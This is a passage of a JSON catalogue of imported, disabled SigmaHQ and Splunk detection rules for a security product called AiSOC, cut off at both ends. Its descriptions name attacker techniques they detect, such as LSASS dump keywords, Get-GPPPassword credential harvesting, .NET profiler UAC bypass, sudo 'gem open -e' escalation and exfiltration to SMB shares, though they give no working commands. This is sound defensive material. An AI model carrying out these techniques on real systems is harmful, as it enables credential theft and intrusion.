"AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1021", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-ssh-login-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff7139bc-fdb1-4437-92f2-6afefe8884cb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_ssh_login_attempt.yml" } }, { "id": "sigmahq-sigma-ff91e3f0-ad15-459f-9a85-1556390c138d", "type": "detection", "name": "Bitbucket Secret Scanning Rule Deleted", "description": "Detects when secret scanning rule is deleted for the project or repository.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-secret-scanning-rule-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff91e3f0-ad15-459f-9a85-1556390c138d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml" } }, { "id": "sigmahq-sigma-ff992eac-6449-4c60-8c1d-91c9722a1d48", "type": "detection", "name": "New Root Certificate Installed Via CertMgr.EXE", "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-root-certificate-installed-via-certmgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certmgr_certificate_installation.yml" } }, { "id": "sigmahq-sigma-ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "type": "detection", "name": "User Added to Remote Desktop Users Group", "description": "Detects addition of users to the local Remote Desktop Users group via \"Net\" or \"Add-LocalGroupMember\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1136.001", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-remote-desktop-users-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml" } }, { "id": "sigmahq-sigma-ffa6861c-4461-4f59-8a41-578c39f3f23e", "type": "detection", "name": "LSASS Dump Keyword In CommandLine", "description": "Detects the presence of the keywords \"lsass\" and \".dmp\" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-dump-keyword-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml" } }, { "id": "sigmahq-sigma-fff9d2b7-e11c-4a69-93d3-40ef66189767", "type": "detection", "name": "Suspicious Copy From or To System Directory", "description": "Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-copy-from-or-to-system-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml" } }, { "id": "splunk-security-content-001266a6-9d5b-11eb-829b-acde48001122", "type": "detection", "name": "Windows Multiple Invalid Users Fail To Authenticate Using Kerberos", "description": "The following analytic identifies a source endpoint failing to authenticate with 30 unique invalid domain users using the Kerberos protocol. This detection leverages EventCode 4768, specifically looking for failure code 0x6, indicating the user is not found in the Kerberos database. This activity is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. If confirmed malicious, this could lead to unauthorized access or privilege escalation within the Active Directory environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-invalid-users-fail-to-authenticate-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "001266a6-9d5b-11eb-829b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_invalid_users_fail_to_authenticate_using_kerberos.yml" } }, { "id": "splunk-security-content-002f1e24-146e-11ec-a470-acde48001122", "type": "detection", "name": "Jscript Execution Using Cscript App", "description": "The following analytic detects the execution of JScript using the cscript.exe process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This behavior is significant because JScript files are typically executed by wscript.exe, making cscript.exe execution unusual and potentially indicative of malicious activity, such as the FIN7 group's tactics. If confirmed malicious, this activity could allow attackers to execute arbitrary scripts, leading to code execution, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/jscript-execution-using-cscript-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "002f1e24-146e-11ec-a470-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/jscript_execution_using_cscript_app.yml" } }, { "id": "splunk-security-content-004e32e2-146d-11ec-a83f-acde48001122", "type": "detection", "name": "XSL Script Execution With WMIC", "description": "The following analytic detects the execution of an XSL script using the WMIC process, which is often indicative of malicious activity. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving WMIC and XSL files. This behavior is significant as it has been associated with the FIN7 group, known for using this technique to execute malicious scripts. If confirmed malicious, this activity could allow attackers to execute arbitrary code, potentially leading to system compromise and further malicious actions within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/xsl-script-execution-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "004e32e2-146d-11ec-a83f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/xsl_script_execution_with_wmic.yml" } }, { "id": "splunk-security-content-00524d1f-a032-46f5-9108-e7d9f01bfb3c", "type": "detection", "name": "Windows Screen Capture in TEMP folder", "description": "The following analytic detects the creation of screen capture files by the Braodo stealer malware. This stealer is known to capture screenshots of the victim's desktop as part of its data theft activities. The detection focuses on identifying unusual screen capture activity, especially when images are saved in directories often used by malware, such as temporary or hidden folders. Monitoring for these files helps to quickly identify malicious screen capture attempts, allowing security teams to respond and mitigate potential information exposure before sensitive data is compromised.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-screen-capture-in-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00524d1f-a032-46f5-9108-e7d9f01bfb3c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_screen_capture_in_temp_folder.yml" } }, { "id": "splunk-security-content-00958c7b-35db-4e7a-ad13-31550a7a7c64", "type": "detection", "name": "O365 Threat Intelligence Suspicious File Detected", "description": "The following analytic identifies when a malicious file is detected within the Microsoft Office 365 ecosystem through the Advanced Threat Protection engine. Attackers may stage and execute malicious files from within the Microsoft Office 365 ecosystem. Any detections from built-in Office 365 capabilities should be monitored and responded to appropriately. Certain premium Office 365 capabilities such as Safe Attachment and Safe Links further enhance these detection and response functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-threat-intelligence-suspicious-file-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00958c7b-35db-4e7a-ad13-31550a7a7c64", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_threat_intelligence_suspicious_file_detected.yml" } }, { "id": "splunk-security-content-00af8f7f-e004-446b-9bba-2732f717ae27", "type": "detection", "name": "ASL AWS EC2 Snapshot Shared Externally", "description": "The following analytic detects when an EC2 snapshot is shared publicly by analyzing AWS CloudTrail events. This detection method leverages CloudTrail logs to identify modifications in snapshot permissions, specifically when the snapshot is shared outside the originating AWS account. This activity is significant as it may indicate an attempt to exfiltrate sensitive data stored in the snapshot. If confirmed malicious, an attacker could gain unauthorized access to the snapshot's data, potentially leading to data breaches or further exploitation of the compromised information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-ec2-snapshot-shared-externally.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00af8f7f-e004-446b-9bba-2732f717ae27", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_ec2_snapshot_shared_externally.yml" } }, { "id": "splunk-security-content-00ca7f9e-88ab-4841-a6c2-83979ab1ed29", "type": "detection", "name": "Windows RDP Login Session Was Established", "description": "The following analytic detects instances where a successful Remote Desktop Protocol (RDP) login session was established, as indicated by Windows Security Event ID 4624 with Logon Type 10. This event confirms that a user has not only provided valid credentials but has also initiated a full interactive RDP session. It is a key indicator of successful remote access to a Windows system. When correlated with Event ID 1149, which logs RDP authentication success, this analytic helps distinguish between mere credential acceptance and actual session establishment\u2014critical for effective monitoring and threat detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-login-session-was-established.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00ca7f9e-88ab-4841-a6c2-83979ab1ed29", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_login_session_was_established.yml" } }, { "id": "splunk-security-content-00d050d3-a5b4-4565-a6a5-a31f69681dc3", "type": "detection", "name": "Windows UAC Bypass Suspicious Escalation Behavior", "description": "The following analytic detects when a process spawns an executable known for User Account Control (UAC) bypass exploitation and subsequently monitors for any child processes with a higher integrity level than the original process.\nThis detection leverages Sysmon EventID 1 data, focusing on process integrity levels and known UAC bypass executables.\nThis activity is significant as it may indicate an attacker has successfully used a UAC bypass exploit to escalate privileges.\nIf confirmed malicious, the attacker could gain elevated privileges, potentially leading to further system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-uac-bypass-suspicious-escalation-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00d050d3-a5b4-4565-a6a5-a31f69681dc3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_uac_bypass_suspicious_escalation_behavior.yml" } }, { "id": "splunk-security-content-00d877c3-7b7b-443d-9562-6b231e2abab9", "type": "detection", "name": "Windows AD AdminSDHolder ACL Modified", "description": "The following analytic detects modifications to the Access Control List (ACL) of the AdminSDHolder object in a Windows domain, specifically the addition of new rules. It leverages EventCode 5136 from the Security Event Log, focusing on changes to the nTSecurityDescriptor attribute. This activity is significant because the AdminSDHolder object secures privileged group members, and unauthorized changes can allow attackers to establish persistence and escalate privileges. If confirmed malicious, this could enable an attacker to control domain-level permissions, compromising the entire Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-adminsdholder-acl-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "00d877c3-7b7b-443d-9562-6b231e2abab9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_adminsdholder_acl_modified.yml" } }, { "id": "splunk-security-content-0115482a-5dcb-4bb0-bcca-5d095d224236", "type": "detection", "name": "Linux Gem Privilege Escalation", "description": "The following analytic detects the execution of the RubyGems utility with elevated privileges, specifically when it is used to run system commands as root. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include \"gem open -e\" and \"sudo\". This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute commands as the root user. If confirmed malicious, this could lead to full system compromise, enabling the attacker to gain root access and execute arbitrary commands with elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-gem-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0115482a-5dcb-4bb0-bcca-5d095d224236", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_gem_privilege_escalation.yml" } }, { "id": "splunk-security-content-0130a0df-83a1-4647-9011-841e950ff302", "type": "detection", "name": "Windows PowerSploit GPP Discovery", "description": "The following analytic detects the execution of the Get-GPPPassword PowerShell cmdlet, which is used to search for unsecured credentials in Group Policy Preferences (GPP). This detection leverages PowerShell Script Block Logging to identify specific script block text associated with this cmdlet. Monitoring this activity is crucial as it can indicate an attempt to retrieve and decrypt stored credentials from SYSVOL, potentially leading to unauthorized access. If confirmed malicious, this activity could allow an attacker to escalate privileges or move laterally within the network by exploiting exposed credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powersploit-gpp-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0130a0df-83a1-4647-9011-841e950ff302", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powersploit_gpp_discovery.yml" } }, { "id": "splunk-security-content-0175f0b7-728d-4038-bbf1-1c30d6ee3d31", "type": "detection", "name": "Windows WBAdmin File Recovery From Backup", "description": "The following analytic identifies the execution of wbadmin.exe with arguments indicative of restoring files from an existing backup.\nWBAdmin is a legitimate Windows Backup utility used for creating, managing, and restoring backups. However, adversaries may abuse it to restore specific files (e.g., sensitive credentials, configuration files, or malware stagers) from prior backups to regain access or re-establish persistence after cleanup or encryption events.\nMonitoring this behavior is important because restoring individual files from a system backup outside of approved recovery workflows may indicate an attacker attempting to retrieve deleted or encrypted data, recover previously dropped payloads, or access prior system states as part of post-compromise activity.\nIf confirmed malicious, this action could enable attackers to regain operational footholds, extract sensitive data, or restore tampered components, undermining remediation and containment efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490", "T1565.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wbadmin-file-recovery-from-backup.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0175f0b7-728d-4038-bbf1-1c30d6ee3d31", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wbadmin_file_recovery_from_backup.yml" } }, { "id": "splunk-security-content-018c1972-ca07-11eb-9473-acde48001122", "type": "detection", "name": "Recon Using WMI Class", "description": "The following analytic detects suspicious PowerShell activity via EventCode 4104, where WMI performs event queries to gather information on running processes or services. This detection leverages PowerShell Script Block Logging to identify specific WMI queries targeting system information classes like Win32_Bios and Win32_OperatingSystem. This activity is significant as it often indicates reconnaissance efforts by an adversary to profile the compromised machine. If confirmed malicious, the attacker could gain detailed system information, aiding in further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/recon-using-wmi-class.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "018c1972-ca07-11eb-9473-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/recon_using_wmi_class.yml" } }, { "id": "splunk-security-content-01a510b3-a6ac-4d50-8812-7e8a3cde3d79", "type": "detection", "name": "O365 FullAccessAsApp Permission Assigned", "description": "The following analytic detects the assignment of the 'full_access_as_app' permission to an application registration in Office 365 Exchange Online. This detection leverages Office 365 management activity logs and filters Azure Active Directory workload events to identify when the specific permission, identified by GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40', is granted. This activity is significant because it provides extensive control over Office 365 operations, including access to all mailboxes and the ability to send mail as any user. If confirmed malicious, this could lead to unauthorized data access, exfiltration, or account compromise. Immediate investigation is required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002", "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-fullaccessasapp-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "01a510b3-a6ac-4d50-8812-7e8a3cde3d79", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_fullaccessasapp_permission_assigned.yml" } }, { "id": "splunk-security-content-01d29b48-ff6f-11eb-b81e-acde48001123", "type": "detection", "name": "7zip CommandLine To SMB Share Path", "description": "The following analytic detects the execution of 7z or 7za processes with command lines pointing to SMB network shares. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it may indicate an attempt to archive and exfiltrate sensitive files to a network share, a technique observed in CONTI LEAK tools. If confirmed malicious, this behavior could lead to data exfiltration, compromising sensitive information and potentially aiding further attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/7zip-commandline-to-smb-share-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "01d29b48-ff6f-11eb-b81e-acde48001123", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/7zip_commandline_to_smb_share_path.yml" } }, { "id": "splunk-security-content-01d9a0c2-cece-11eb-ab46-acde48001122", "type": "detection", "name": "Detect WMI Event Subscription Persistence", "description": "The following analytic identifies the creation of WMI Event Subscriptions, which can be used to establish persistence or perform privilege escalation. It detects EventID 19 (EventFilter creation), EventID 20 (EventConsumer creation), and EventID 21 (FilterToConsumerBinding creation) from Sysmon logs. This activity is significant because WMI Event Subscriptions can execute code with elevated SYSTEM privileges, making it a powerful persistence mechanism. If confirmed malicious, an attacker could maintain long-term access, escalate privileges, and execute arbitrary code, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-wmi-event-subscription-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "01d9a0c2-cece-11eb-ab46-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_wmi_event_subscription_persistence.yml" } }, { "id": "splunk-security-content-01f0aef4-8591-4daa-a53d-0ed49823b681", "type": "detection", "name": "Windows Abused Web Services", "description": "The following analytic detects a suspicious process making DNS queries to known, abused web services such as text-paste sites, VoIP, secure tunneling, instant messaging, and digital distribution platforms. This detection leverages Sysmon logs with Event ID 22, focusing on specific query names. This activity is significant as it may indicate an adversary attempting to download malicious files, a common initial access technique. If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further compromise of the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-abused-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "01f0aef4-8591-4daa-a53d-0ed49823b681", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_abused_web_services.yml" } }, { "id": "splunk-security-content-023f3452-5f27-11ec-bf00-acde48001122", "type": "detection", "name": "Linux Add Files In Known Crontab Directories", "description": "The following analytic detects unauthorized file creation in known crontab directories on Unix-based systems. It leverages filesystem data to identify new files in directories such as /etc/cron* and /var/spool/cron/*. This activity is significant as it may indicate an attempt by threat actors or malware to establish persistence on a compromised host. If confirmed malicious, this could allow attackers to execute arbitrary code at scheduled intervals, potentially leading to further system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-add-files-in-known-crontab-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "023f3452-5f27-11ec-bf00-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_add_files_in_known_crontab_directories.yml" } }, { "id": "splunk-security-content-0247f90a-aca4-47b2-a94d-e30f445d7b41", "type": "detection", "name": "Windows File and Directory Permissions Enable Inheritance", "description": "The following analytic detects the enabling of permission inheritance using ICACLS. This analytic identifies instances where ICACLS commands are used to enable permission inheritance on files or directories. The /inheritance:e flag, which restores inherited permissions from a parent directory, is monitored to detect changes that might reapply broader access control settings. Enabling inheritance can indicate legitimate administrative actions but may also signal attempts to override restrictive custom permissions, potentially exposing sensitive files to unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-and-directory-permissions-enable-inheritance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0247f90a-aca4-47b2-a94d-e30f445d7b41", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_and_directory_permissions_enable_inheritance.yml" } }, { "id": "splunk-security-content-0252ca80-e30d-11eb-8aa3-acde48001122", "type": "detection", "name": "NET Profiler UAC bypass", "description": "The following analytic detects modifications to the registry aimed at bypassing the User Account Control (UAC) feature in Windows. It identifies changes to the .NET COR_PROFILER_PATH registry key, which can be exploited to load a malicious DLL via mmc.exe. This detection leverages data from the Endpoint.Registry datamodel, focusing on specific registry paths and values. Monitoring this activity is crucial as it can indicate an attempt to escalate privileges or persist within the environment. If confirmed malicious, this could allow an attacker to execute arbitrary code with elevated 